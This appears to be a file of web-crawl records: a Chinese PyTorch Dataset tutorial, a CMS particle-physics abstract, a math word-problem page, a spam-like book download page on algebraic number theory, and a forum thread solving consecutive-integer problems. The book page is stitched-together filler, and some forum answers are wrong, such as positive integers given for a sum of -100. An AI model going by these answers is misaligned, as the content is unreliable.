[ "python", null, "## 一、Dataset\n\nDataset 类提供一种方式去获取数据及其标签\n\n• 获取每一个数据及其标签\n• 获取数据的总量大小\n\n### 1. 在控制台进行操作\n\nHymenoptera (膜翅目昆虫)数据集下载地址:\n\n• 不同的类别以文件夹的形式存在,文件夹中是该类别的图片\n• 图片与标签分别存储,图片在一个文件夹下,`label`信息在另一个文件夹下\n• `label`直接写在图片名称里\n\n#### ①获取图片的基本信息\n\n```from PIL import Image\nimg_path = \"./dataset/hymenoptera_data/train/ants/0013035.jpg\"\nimg = Image.open(img_path)\n```", null, "", null, "#### ②获取文件的基本信息\n\n```dir_path = \"dataset/hymenoptera_data/train/ants\"\nimport os\nimg_path_list = os.listdir(dir_path)\nimg_path_list\n```", null, "### 2. 编写一个继承Dataset 的类加载数据\n\n#### ①定义 MyData类\n\n```from torch.utils.data import Dataset\nfrom PIL import Image\nimport os\n```\n\n• `__init__`:初始化函数\n• `__getitem__`:返回指定下标的图片和标签\n• `__len__`:返回数据集的大小\n```class MyData(Dataset):\ndef __init__(self, root_dir, label_dir):\nself.root_dir = root_dir\nself.label_dir = label_dir\nself.path = os.path.join(self.root_dir, self.label_dir)\nself.img_path = os.listdir(self.path)\ndef __getitem__(self, idx):\nimg_name = self.img_path[idx]\nimg_item_path = os.path.join(self.root_dir, self.label_dir, img_name)\nimg = Image.open(img_item_path)\nlabel = self.label_dir\nreturn img, label\ndef __len__(self):\nreturn len(self.img_path)```\n\n#### ②创建类的实例并调用\n\n```if __name__ == \"__main__\":\nroot_dir = \"../dataset/hymenoptera_data/train\"\nants_label_dir = \"ants\"\nbees_label_dir = \"bees\"\nants_dataset = MyData(root_dir, ants_label_dir)\nbees_dataset = MyData(root_dir, bees_label_dir)\n```\n\n``` img, label = ants_dataset.__getitem__(3)\nprint(ants_dataset.__len__(), label)\nimg.show()\n```\n\n`train_dataset = ants_dataset + bees_dataset`\n\n• DataLoader 会根据`batch_size`的值对数据进行打包\n• 导入所需的包\n```import torchvision\nfrom torch.utils.tensorboard import SummaryWriter\n```\n\n```test_data = torchvision.datasets.CIFAR10(\"./dataset\", train=False, transform=torchvision.transforms.ToTensor())\n```\n\n```img, target = test_data\nprint(img.shape)\nprint(target)\n```\n\n```writer = SummaryWriter(\"dataloader\")\nfor epoch in range(2):\nstep = 0" ]
[ null, "https://icws.jb51.net/images/weixin_jb51.gif", null, "https://img.jbzj.com/file_images/article/202210/2022101311232767.png", null, "https://img.jbzj.com/file_images/article/202210/2022101311232768.png", null, "https://img.jbzj.com/file_images/article/202210/2022101311232769.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.5690494,"math_prob":0.8644733,"size":2872,"snap":"2022-40-2023-06","text_gpt3_token_len":1270,"char_repetition_ratio":0.13493724,"word_repetition_ratio":0.0,"special_character_ratio":0.22632311,"punctuation_ratio":0.20792079,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98124415,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-31T17:57:13Z\",\"WARC-Record-ID\":\"<urn:uuid:94828919-fd70-4a5a-ae45-c67f9d3ed40c>\",\"Content-Length\":\"17947\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:15bec384-bb46-4f3c-8a7e-6b5eef367ff6>\",\"WARC-Concurrent-To\":\"<urn:uuid:0d8a7833-8424-46b0-9f2d-6898f4773ad6>\",\"WARC-IP-Address\":\"157.185.158.198\",\"WARC-Target-URI\":\"https://m.jb51.net/article/264964.htm\",\"WARC-Payload-Digest\":\"sha1:GS7XKPNBLUWKWE5SUDANVVHDRJKT7DA3\",\"WARC-Block-Digest\":\"sha1:H7SO4ODJTK3F47PTGPIIHHN27LHWGG4Q\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499888.62_warc_CC-MAIN-20230131154832-20230131184832-00798.warc.gz\"}"}
http://www.sujv.cz/cz/index.php?Ns=202&id=1001202
[ "Search for heavy neutrinos and third-generation leptoquarks in hadronic states of two leptons and two jets in proton-proton collisions at root s=13 TeV\n\nAutor\n Sirunyan A.M. Yerevan Physics Institute, Armenia Finger Miroslav, prof. Ing. DrSc. Matematicko-fyzikální fakulta UK v Praze Finger Michael, M.Sc. CSc. Matematicko-fyzikální fakulta UK v Praze, SÚJV Dubna Matveev V.A. SÚJV et al. různé instituce\n\nRok\n2019\n\nČasopis\nJOURNAL OF HIGH ENERGY PHYSICS 3 170\n\nWeb\n\nObsah\nA search for new particles has been conducted using events with two high transverse momentum leptons that decay hadronically and at least two energetic jets. The analysis is performed using data from proton-proton collisions at 13 TeV, collected by the CMS experiment at the LHC in 2016 and corresponding to an integrated luminosity of 35.9 fb(-1). The observed data are consistent with standard model expectations. The results are interpreted in the context of two physics models. The first model involves right-handed charged bosons, W-R, that decay to heavy right-handed Majorana neutrinos, N ( = e, , ), arising in a left-right symmetric extension of the standard model. The model considers that N-e and N are too heavy to be detected at the LHC. Assuming that the N mass is half of the W-R mass, masses of the W-R boson below 3.50 TeV are excluded at 95% confidence level. Exclusion limits are also presented considering different scenarios for the mass ratio between N and W-R, as a function of W-R mass. In the second model, pair production of third-generation scalar leptoquarks that decay into bb is considered, resulting in an observed exclusion region with leptoquark masses below 1.02 TeV, assuming a 100% branching fraction for the leptoquark decay to a lepton and a bottom quark. These results represent the most stringent limits to date on these models." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8507976,"math_prob":0.87572706,"size":2037,"snap":"2019-51-2020-05","text_gpt3_token_len":499,"char_repetition_ratio":0.116084605,"word_repetition_ratio":0.18181819,"special_character_ratio":0.2204222,"punctuation_ratio":0.09768637,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9548579,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-08T16:16:12Z\",\"WARC-Record-ID\":\"<urn:uuid:a09e8ffd-62ac-4ba7-a0fa-5eaf349171cd>\",\"Content-Length\":\"10643\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:74fc532a-76da-4b8e-b711-ab69f81fb66b>\",\"WARC-Concurrent-To\":\"<urn:uuid:82ff1836-0980-4e4c-8265-53b354a64107>\",\"WARC-IP-Address\":\"93.190.48.4\",\"WARC-Target-URI\":\"http://www.sujv.cz/cz/index.php?Ns=202&id=1001202\",\"WARC-Payload-Digest\":\"sha1:YV2M7ZO5P7H4SVO5SFGVCXDATAQDVQYB\",\"WARC-Block-Digest\":\"sha1:FF2LS4GBHOIBTPBAX2NXIIGWDOESIYG5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540511946.30_warc_CC-MAIN-20191208150734-20191208174734-00449.warc.gz\"}"}
https://www.hackmath.net/en/math-problem/2981
[ "Tram lines\n\nTrams of five lines driven at intervals of 5,8,10,12 and 15 minutes. At 12 o'clock come out of the station at the same time. About how many hours again all meet? How many times have earch tram pass for this stop?\n\nResult\n\nt =  2 h\na =  24\nb =  15\nc =  12\nd =  10\ne =  8\n\nSolution:", null, "", null, "", null, "", null, "", null, "", null, "Leave us a comment of this math problem and its solution (i.e. if it is still somewhat unclear...):", null, "Be the first to comment!", null, "To solve this verbal math problem are needed these knowledge from mathematics:\n\nDo you want to calculate least common multiple two or more numbers?\n\nNext similar math problems:\n\n1. Bus lines", null, "Buses connections are started from bus stop on its regular circuit as follows: No. 27 bus every 27 minutes and No.18 every half hour. What time started this two bus lines run if the bus stop met at 10:15 am.?\n2. Ships", null, "Red ship begins its circuit every 30 minutes. Blue boat begins its circuit every 45 minutes. Both ships begin their sightseeing circuit in the same place at the same time always at 10:00 o'clock. a / What time does meet boat again? b / How many times a da\n3. Pills", null, "If it takes 20 minutes to run a batch of 100 pills how many minutes would it take to run a batch of 50 pills\n4. Temperature increase", null, "If the temperature at 9:am is 50 degrees. What is the temperature at 5:00pm if the temperature increases 4 degrees Fahrenheit each hour?\n5. Timeage", null, "Seven times of my age is 8 less than the largest two-digit number. How old I am?\n6. Balls groups", null, "Karel pulled the balls out of his pocket and divide it into the groups. He could divide them in four, six or seven, and no ball ever left. How little could be a ball?\n7. Lcm simple", null, "Find least common multiple of this two numbers: 140 175.\n8. Bed time", null, "Tiffany was 5 years old; her week night bedtime grew by ¼ hour each year. If, at age 18, her curfew time is 11pm, what was her bed time when she was 5 years old?\n9. Chocolate", null, "I eat 24 chocolate in 10 days. How many chocolate I eat in 15 days at the same pace?\n10. How old", null, "The student who asked how many years he answered: \"After 10 years I will be twice as old than as I was four years ago. How old is student?\n11. Simple equation 9", null, "Solve the following equation: -8y+5=-9y+9\n12. Teacher", null, "Teacher Rem bought 360 pieces of cupcakes for the outreach program of their school. 5/9 of the cupcakes were chocolate flavor and 1/4 wete pandan flavor and the rest were a vanilla flavor. How much more pandan flavor cupcakes than vanilla flavor?\n13. Norm", null, "Three workers planted 3555 seedlings of tomatoes in one dey. First worked at the standard norm, the second planted 120 seedlings more and the third 135 seedlings more than the first worker. How many seedlings were standard norm?\n14. Street numbers", null, "Lada came to aunt. On the way he noticed that the houses on the left side of the street have odd numbers on the right side and even numbers. The street where he lives aunt, there are 5 houses with an even number, which contains at least one digit number 6.\n15. Hotel", null, "The hotel has a p floors each floor has i rooms from which the third are single and the others are double. Represents the number of beds in hotel.\n16. Unknown number 11", null, "That number increased by three equals three times itself?\n17. Equation 29", null, "Solve next equation: 2 ( 2x + 3 ) = 8 ( 1 - x) -5 ( x -2 )" ]
[ null, "https://www.hackmath.net/tex/f39/f391a7ccd785e.svg", null, "https://www.hackmath.net/tex/467/467f57bb72784.svg", null, "https://www.hackmath.net/tex/791/791ec35a5b8d0.svg", null, "https://www.hackmath.net/tex/144/144846b3dc88f.svg", null, "https://www.hackmath.net/tex/f89/f89c61c6ee96c.svg", null, "https://www.hackmath.net/tex/ab1/ab1a3e33fca08.svg", null, "https://www.hackmath.net/hashover/images/first-comment.png", null, "https://www.hackmath.net/hashover/images/avatar.png", null, "https://www.hackmath.net/thumb/79/t_2979.jpg", null, "https://www.hackmath.net/thumb/2/t_2202.jpg", null, "https://www.hackmath.net/thumb/51/t_5051.jpg", null, "https://www.hackmath.net/thumb/24/t_7424.jpg", null, "https://www.hackmath.net/thumb/45/t_1645.jpg", null, "https://www.hackmath.net/thumb/38/t_4638.jpg", null, "https://www.hackmath.net/thumb/37/t_3937.jpg", null, "https://www.hackmath.net/thumb/46/t_5546.jpg", null, "https://www.hackmath.net/thumb/4/t_2504.jpg", null, "https://www.hackmath.net/thumb/5/t_5205.jpg", null, "https://www.hackmath.net/thumb/72/t_9672.jpg", null, "https://www.hackmath.net/thumb/29/t_5229.jpg", null, "https://www.hackmath.net/thumb/22/t_4022.jpg", null, "https://www.hackmath.net/thumb/10/t_1510.jpg", null, "https://www.hackmath.net/thumb/26/t_3026.jpg", null, "https://www.hackmath.net/thumb/48/t_4048.jpg", null, "https://www.hackmath.net/thumb/53/t_6853.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.96033233,"math_prob":0.96959096,"size":3148,"snap":"2019-43-2019-47","text_gpt3_token_len":802,"char_repetition_ratio":0.09764631,"word_repetition_ratio":0.0033112583,"special_character_ratio":0.26048285,"punctuation_ratio":0.1051051,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9689955,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-15T16:58:13Z\",\"WARC-Record-ID\":\"<urn:uuid:3596edaf-c08a-43a4-8895-c33822410dc9>\",\"Content-Length\":\"22349\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ad6abe73-c983-41f6-826e-8554e074f7a1>\",\"WARC-Concurrent-To\":\"<urn:uuid:e2575b24-358c-41d5-b783-2b3cda104c4a>\",\"WARC-IP-Address\":\"104.24.104.91\",\"WARC-Target-URI\":\"https://www.hackmath.net/en/math-problem/2981\",\"WARC-Payload-Digest\":\"sha1:5YEZ6BSL7HGFGVPTVWCWBRHQ37ENRT7R\",\"WARC-Block-Digest\":\"sha1:2CLON3ZGJB4AQM7JLP3SZTJDFF7NALV3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986660067.26_warc_CC-MAIN-20191015155056-20191015182556-00191.warc.gz\"}"}
https://fisodomylyfazasad.clubhipicbanyoles.com/introductory-algebraic-number-theory-book-23716gn.php
[ "# Introductory algebraic number theory\n\nby Ећaban Alaca\n\nPublisher: Cambridge University Press in Cambridge, New York\n\nWritten in English", null, "Published: Pages: 428 Downloads: 201\n\n## Subjects:\n\n• Algebraic number theory -- Textbooks\n\n## Edition Notes\n\nIncludes bibliographical references (p. 423-424) and index.\n\nClassifications The Physical Object Statement Şaban Alaca, Kenneth S. Williams. Genre Textbooks. Contributions Williams, Kenneth S. LC Classifications QA247 .A43 2004 Pagination xvii, 428 p. ; Number of Pages 428 Open Library OL15578044M ISBN 10 0521540119, 0521832500 LC Control Number 2003051243 OCLC/WorldCa 52092116\n\nGet this from a library! Introductory algebraic number theory. [Şaban Alaca; Kenneth S Williams] -- Alaca and Williams, both affiliated with the Mathematics Department at Carleton University, Canada, introduce algebraic number theory in this text suitable for senior undergraduates and beginning. An Introduction to Algebraic Number Theory. This note covers the following topics: Algebraic numbers and algebraic integers, Ideals, Ramification theory, Ideal class group and units, p-adic numbers, Valuations, p-adic fields. For example, here are some problems in number theory that remain unsolved. (Recall that a prime number is an integer greater than 1 whose only positive factors are 1 and the number itself.) Note that these problems are simple to state — just because a topic is accessibile does not mean that it is easy. 1. Steven Weintraub's Galois Theory text is a good preparation for number theory. It develops the theory generally before focusing specifically on finite extensions of \\$\\mathbb{Q},\\$ which will be immediately useful to a student going on to study algebraic number theory.\n\nThis book provides an introduction to algebraic number theory suitable for senior undergraduates and beginning graduate students in mathematics. The material is presented in a straightforward, clear and elementary fashion, and the approach is hands on, with an explicit computational flavor/5(6). Higher-dimensional algebra Homological algebra K-theory Lie algebroid Lie groupoid List of important publications in mathematics Serre spectral sequence Sheaf (mathematics) Topological quantum field theory Seifert–van Kampen theorem Algebraic topology (object) Operad theory Quadratic algebra Filtered algebra Graded ring Algebraic number. Elementary Number Theory (Dudley) provides a very readable introduction including practice problems with answers in the back of the book. It is also published by Dover which means it is going to be very cheap (right now it is \\$ on Amazon). It'. Introduction to Algebraic Number Theory | Frédérique Oggier | download | B–OK. Download books for free. Find books.\n\nIn this section we will meet some of the concerns of Number Theory, and have a brief revision of some of the relevant material from Introduction to Algebra. Overview Number theory is about properties of the natural numbers, integers, or rational numbers, such as the following: • Given a natural number n, is it prime or composite?File Size: KB. introduction to p adic analytic number theory Download introduction to p adic analytic number theory or read online books in PDF, EPUB, Tuebl, and Mobi Format. Click Download or Read Online button to get introduction to p adic analytic number theory book now. This site is like a library, Use search box in the widget to get ebook that you want. “In this book, the author leads the readers from the theorem of unique factorization in elementary number theory to central results in algebraic number theory. This book is designed for being used in undergraduate courses in algebraic number theory; the clarity of the exposition and the wealth of examples and exercises (with hints and Brand: Springer International Publishing.\n\n## Introductory algebraic number theory by Ећaban Alaca Download PDF EPUB FB2\n\nThis book is an outstanding introduction to algebraic number theory for upper-level undergraduates. The authors have done a great job keeping prerequisites to a minimum: some linear algebra and one semester of undergraduate algebra should suffice/5(7).\n\nIntroductory Algebraic Number Theory - Kindle edition by Alaca, Saban, Williams, Kenneth S. Download it once and read it on your Kindle device, PC, phones or tablets. Use features like bookmarks, note taking and highlighting while reading Introductory Algebraic Number Theory/5(8).\n\nIntroductory Algebraic Number Theory. Suitable for senior undergraduates and beginning graduate students in mathematics, this book is an introduction to algebraic number theory at an elementary level. Prerequisites are kept to a minimum, and numerous examples illustrating the material occur throughout the text/5.\n\n'This book provides a nice introduction to classical parts of algebraic number theory. The text is written in a lively style and can be read without any prerequisites.\n\nTherefore the book is very suitable for graduate students starting mathematics courses or mathematicians interested in introductory reading in algebraic number by: INTRODUCTORY ALGEBRAIC NUMBER THEORY Algebraic number theory is a subject that came into being through the attempts of mathe-maticians to try to prove Fermat’s last theorem and that now has a wealth of applications to Diophantine equations, cryptography.\n\nThis book is a genetic introduciton to algebraic number theory which follows the development of the subject in the work of Fermat, Kummer and others, motivating new ideas and techniques by explaining the problems which led to their by: such extension can be represented as all polynomials in an algebraic number α: K = Q(α) = (Xm n=0 anα n: a n ∈ Q).\n\nHere α is a root of a polynomial with coefficients in Q. Algebraic number theory involves using techniques from (mostly commutative) algebra and finite group theory to gain a deeper understanding of number Size: KB. Book recommendations for people who like Introductory Algebraic Number Theory by Saban Alaca, Kenneth S Williams.\n\nRegister for free to build your own book lists Books. Number theory is a vast and sprawling subject, and over the years this book has acquired many new chapters. In order to keep the length of this edition to a reasonable size, Chapters 47–50 have been removed from the printed version of the book.\n\nThese omitted chapters are freely available by clicking the following link: Chapters 47– 2 Preface These notes serve as course notes for an undergraduate course in number the- ory.\n\nMost if not all universities worldwide offer introductory courses in number theory for math majors and in many cases as an elective course. The notes contain a useful introduction to important topics that need to be ad- dressed in a course in number theory.\n\nA catalog record for this book is available from the British Library. Library of Congress Cataloging in Publication Data Alaca, Saban, – Introductory algebraic number theory / Saban Alaca, Kenneth S.\n\nWilliams. Includes bibliographical references and index. ISBN (hb.) – ISBN (pbk.) 1. Algebraic number. Introductory Algebraic Number Theory by Saban Alaca () [Saban Alaca;Kenneth S. Williams] on *FREE* shipping on qualifying offers. Will be shipped from US. Used books may not include companion materials, may have some shelf wear, may contain highlighting/notes/5(7).\n\nAn algebraic number field is a finite extension of Q; an algebraic number is an element of an algebraic number field. Algebraic number theory studies the arithmetic of algebraic number fields — the ring of integers in the number field, the ideals and units in the ring of integers, the extent to which unique factorization holds, and so on.\n\nThis book is a concise introduction to number theory and some related algebra, with an emphasis on solving equations in integers. Finding integer solutions led to two fundamental ideas of number theory in ancient times - the Euclidean algorithm and unique prime factorization - and in modern times to two fundamental ideas of algebra - rings and by: An Introduction to Algebraic Number Theory.\n\nThis note covers the following topics: Algebraic numbers and algebraic integers, Ideals, Ramification theory, Ideal class group and units, p-adic numbers, Valuations, p-adic fields.\n\nAuthor(s): Frederique Oggier. This book is an introduction to algebraic number theory, meaning the study of arithmetic in finite extensions of the rational number field \\(\\mathbb{Q}\\).\n\nOriginating in the work of Gauss, the foundations of modern algebraic number theory are due to Dirichlet, Dedekind, Kronecker, Kummer, and others. I talked to Hy Bass, the author of the classic book Algebraic K-theory, about what would be involved in writing such a book.\n\nIt was scary, because (in ) I didn't know even how to write a book. I needed a warm-up exercise, a practice book if you will. The result, An introduction to homological algebra, took over five years to write.\n\nIntroductory algebraic number theory Saban Alaca, Kenneth S. Williams Suitable for senior undergraduates and beginning graduate students in mathematics, this book is an introduction to algebraic number theory at an elementary level.\n\nPrerequisites are kept to a minimum, and numerous examples illustrating the material occur throughout the text. Suitable for senior undergraduates and beginning graduate students in mathematics, this book is an introduction to algebraic number theory at an elementary level.\n\nPrerequisites are kept to a minimum, and numerous examples illustrating the material occur throughout the text/5(6). Algebraic number theory involves using techniques from (mostly commutative) algebra and nite group theory to gain a deeper understanding of the arithmetic of number elds and related objects (e.g., functions elds, elliptic curves, etc.).\n\nThe main objects that we study in. Marcus's Number Fields is a good intro book, but its not in Latex, so it looks ugly. Also doesn't do any local (p-adic) theory, so you should pair it with Gouvea's excellent intro p-adic book and you have great first course is algebraic number theory.\n\nIntroduction to Number Theory Lecture Notes. This note covers the following topics: Pythagorean Triples, The Primes, The greatest common divisor, the lowest common multiple and the Euclidean Algorithm, Linear Diophantine Equations, The Extended Euclidean Algorithm and Linear Modular Congruences, Modular Inverses and the Chinese Remainder Theorem, The Proof of Hensel’s.\n\nThe book is a standard text for taught courses in algebraic number theory. This Second Edition Front Cover. John William Scott Cassels, Albrecht Fröhlich. milestone event that introduced class field theory as a standard tool of The book is a standard text for taught courses in algebraic number.\n\nTheory of Numbers Lecture Notes. This lecture note is an elementary introduction to number theory with no algebraic prerequisites. Topics covered include primes, congruences, quadratic reciprocity, diophantine equations, irrational numbers, continued fractions, and partitions. 'This book provides a nice introduction to classical parts of algebraic number theory.\n\nThe text is written in a lively style and can be read without any prerequisites. Therefore the book is very suitable for graduate students starting mathematics courses or mathematicians interested in introductory reading in algebraic number theory/5(6). Cambridge University Press, p.\n\nEncyclopedia of Mathematics and its Applications, ISBNThis classic book gives a thorough introduction to constructive algebraic number theory, and is therefore especially suited as a textbook for a course on that. Number Theory Books, A Conversational Introduction to Algebraic Number Theory: Arithmetic Beyond ℤ, Paul Pollack, AMS Student Mathematical LibrMAA review; Modern Cryptography and Elliptic Curves: A Beginner's Guide, Thomas Shemanske, AMS Student Mathematical LibrReview by Mark Hunacek.\n\nI have experience in abstract algebra up to fields and field extensions using Artin's Algebra. I am wondering what book would be the most user friendly but also rigorous introduction to algebraic number theory.\n\nIntroduction The first part of this book is an introduction to group begins with a study of permutation groups in chapter ically this was one of the starting points of group fact it was in the context of permutations of the roots of a polynomial that they first appeared (see).\n\nAsecond starting point was. The text is written in a lively style and can be read without any prerequisites. Therefore the book is very suitable for graduate students starting mathematics courses or mathematicians interested in introductory reading in algebraic number theory. The book presents a welcome addition to the existing literature.' EMS Newsletter.\n\nFrom the PublisherPrice: \\$. Another interesting book: A Pathway Into Number Theory - Burn [B.B] The book is composed entirely of exercises leading the reader through all the elementary theorems of number theory. Can be tedious (you get to verify, say, Fermat's little theorem for maybe \\$5\\$ different sets of numbers) but a good way to really work through the beginnings of.\n\nA Computational Introduction to Number Theory and Algebra by Victor Shoup A Course In Algebraic Number Theory by Robert B. Ash Elementary and algebraic number theory by Author: Kevin de Asis.This introduction to algebraic number theory via the famous problem of \"Fermat's Last Theorem\" follows its historical development, beginning with the work of Fermat and ending with Kummer's theory of ." ]
[ null, "https://covers.openlibrary.org/b/id/8665657-M.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8944408,"math_prob":0.87714934,"size":9657,"snap":"2021-21-2021-25","text_gpt3_token_len":1981,"char_repetition_ratio":0.18771367,"word_repetition_ratio":0.18665768,"special_character_ratio":0.18556488,"punctuation_ratio":0.10847659,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9903012,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-18T14:57:34Z\",\"WARC-Record-ID\":\"<urn:uuid:54b02ad0-17de-4314-ba42-ac2ddea7392e>\",\"Content-Length\":\"28818\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:98a2c98a-315b-4806-82f9-611fe4b9b410>\",\"WARC-Concurrent-To\":\"<urn:uuid:9b03e1de-6a65-47cd-b1f3-e64c2f7023a7>\",\"WARC-IP-Address\":\"104.21.90.118\",\"WARC-Target-URI\":\"https://fisodomylyfazasad.clubhipicbanyoles.com/introductory-algebraic-number-theory-book-23716gn.php\",\"WARC-Payload-Digest\":\"sha1:GXF25JQKQX2HYI3UCRERMS6TJLBV4I2Z\",\"WARC-Block-Digest\":\"sha1:6DI624XM7DXTHUVCABKJPJS4VS3QB7RI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487637721.34_warc_CC-MAIN-20210618134943-20210618164943-00123.warc.gz\"}"}
http://www.xpmath.com/forums/showthread.php?s=427bc4106e845b546f6349966a210beb&p=19309
[ "", null, "pls help algebra problems :(? - XP Math - Forums", null, "Sign Up FREE! | Sign In | Classroom Setup | Common Core Alignment", null, "", null, "XP Math - Forums", null, "pls help algebra problems :(?", null, "07-25-2007 #1 Anonymous Guest   Posts: n/a", null, "pls help algebra problems :(? 1)the sum of four consecutive integers is -106.2)The product of two consectuve even integers is 1683) The sum of four consecutive even integers is -100", null, "07-25-2007 #2 Lidya Guest   Posts: n/a", null, "The product of two consecutive even integers is 168 and the numbers are 12 and 14the sum of four consecutive intigers is -106 and the numbers are -25, -26,-27 and -28The sum of four consecutive even inegers is -100 and the numbers are -22, -24, -26 and -28.", null, "07-25-2007 #3 The One Gun Kid Guest   Posts: n/a", null, "x+x+1+x+2+x+3 = -1064x +6 = -1064x = -112x = -28x(x + 2) = 168x^2 + 2x -168 = 0(x +14)(x - 12)12, 14x+x+2+x+4+x+6 = -1004x + 12 = -1004x = -112x = -28", null, "07-25-2007 #4 ucla bruin fan! Guest   Posts: n/a", null, "A) -25+-26+-27+-28b) 12 * 14c) )-22+-24+-26+-28", null, "07-25-2007 #5 zohair Guest   Posts: n/a", null, "1)the sum of four consecutive integers is -106.x+x+1+x+2+x+3=4x+6=-1064x=-112x=-28ans -28 -27 -26 -252)The product of two consectuve even integers is 1682x(2x+2)=1684x^2+4x-168=0x^+x-42-0x=6, -7ans12 14or-14 -123) The sum of four consecutive even integers is -1002x+2x+2+2x+4+2x+6=1008x+12=1008x=88x=11ans22 24 26 28", null, "07-25-2007 #6 Nterprize Guest   Posts: n/a", null, "(1) x + (x+1) + (x +2) + (x+3) = -1064x + 6 = -106x = -28so the 4 integers are -28, -27, -26, -25(2) (2n)*(2n+2) = 1684n^2 + 4n - 168 = 0solve this quadratic to get n = 6the 2 integers are 12, 14(3) 2p + (2p+2) + (2p+4) + (2p+6) = -1008p + 12 = -100p = -14the 4 integers are -28, -26, -24, -22\n\n Thread Tools", null, "Show Printable Version", null, "Email this Page Display Modes", null, "Linear Mode", null, "Switch to Hybrid Mode", null, "Switch to Threaded Mode", null, "Posting Rules You may not post new threads You may not post replies You may not post attachments You may not edit your posts BB code is On Smilies are On [IMG] code is On HTML code is Off Forum Rules\n Forum Jump User Control Panel Private Messages Subscriptions Who's Online Search Forums Forums Home Welcome     XP Math News     Off-Topic Discussion Mathematics     XP Math Games Worksheets     Homework Help     Problems Library     Math Challenges\n\nAll times are GMT -4. The time now is 08:30 PM.\n\n Contact Us - XP Math - Forums - Archive - Privacy Statement - Top" ]
[ null, "http://pixel.quantserve.com/pixel/p-86LrmNwPR1u2g.gif", null, "http://www.xpmath.com/images/xpmath_banner_logo.gif", null, "http://www.xpmath.com/images/pdf-icon.gif", null, "http://www.xpmath.com/forums/images/silk/misc/navbits_start.gif", null, "http://www.xpmath.com/forums/images/silk/misc/navbits_finallink_ltr.gif", null, "http://www.xpmath.com/forums/images/silk/statusicon/post_old.gif", null, "http://www.xpmath.com/forums/images/icons/icon1.gif", null, "http://www.xpmath.com/forums/images/silk/statusicon/post_old.gif", null, "http://www.xpmath.com/forums/images/icons/icon1.gif", null, "http://www.xpmath.com/forums/images/silk/statusicon/post_old.gif", null, "http://www.xpmath.com/forums/images/icons/icon1.gif", null, "http://www.xpmath.com/forums/images/silk/statusicon/post_old.gif", null, "http://www.xpmath.com/forums/images/icons/icon1.gif", null, "http://www.xpmath.com/forums/images/silk/statusicon/post_old.gif", null, "http://www.xpmath.com/forums/images/icons/icon1.gif", null, "http://www.xpmath.com/forums/images/silk/statusicon/post_old.gif", null, "http://www.xpmath.com/forums/images/icons/icon1.gif", null, "http://www.xpmath.com/forums/images/silk/buttons/printer.gif", null, "http://www.xpmath.com/forums/images/silk/buttons/sendtofriend.gif", null, "http://www.xpmath.com/forums/images/silk/buttons/mode_linear.gif", null, "http://www.xpmath.com/forums/images/silk/buttons/mode_hybrid.gif", null, "http://www.xpmath.com/forums/images/silk/buttons/mode_threaded.gif", null, "http://www.xpmath.com/forums/images/silk/buttons/collapse_thead.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7667798,"math_prob":0.99085855,"size":1533,"snap":"2021-04-2021-17","text_gpt3_token_len":650,"char_repetition_ratio":0.1530412,"word_repetition_ratio":0.08424909,"special_character_ratio":0.53881276,"punctuation_ratio":0.072289154,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9965078,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-26T00:30:46Z\",\"WARC-Record-ID\":\"<urn:uuid:c3737e4a-3582-4e7a-bdd9-4b7a0ab05b58>\",\"Content-Length\":\"71149\",\"Content-Type\":\"application/http; 